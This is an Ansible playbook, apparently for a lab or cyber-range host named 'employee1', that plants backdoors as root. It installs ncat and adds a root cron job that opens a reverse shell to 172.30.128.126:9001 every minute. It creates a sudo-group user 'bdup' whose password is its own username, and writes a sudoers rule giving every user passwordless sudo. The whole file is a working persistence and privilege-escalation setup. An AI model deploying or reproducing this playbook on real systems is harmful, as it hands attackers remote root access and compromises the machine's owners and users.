---
- hosts: employee1
  vars:
    bd_username: "bdup"
  gather_facts: no
  become: yes
  tasks:
  - name: Install insecure ncat version
    ansible.builtin.apt:
      name: ncat
      state: latest
      update_cache: yes

  - name: Copy reverse shell cron
    ansible.builtin.copy:
      content: |
        * * * * * ncat 172.30.128.126 9001 -e /bin/bash
      dest: /var/spool/cron/crontabs/root
      owner: root
      group: crontab
      mode: '0600'

  - name: Add insecure user bdup
    ansible.builtin.user:
      name: bdup
      password: "{{ bd_username | password_hash('sha512') }}"
      shell: /bin/bash
      groups: sudo
      append: yes

  - name: "Allow bdup paswordless sudo."
    ansible.builtin.copy:
      content: |
        ALL ALL=(ALL) NOPASSWD: ALL
      dest: /etc/sudoers.d/bdup
      validate: /usr/sbin/visudo -cf %s
      owner: root
      group: root
      mode: '0440'

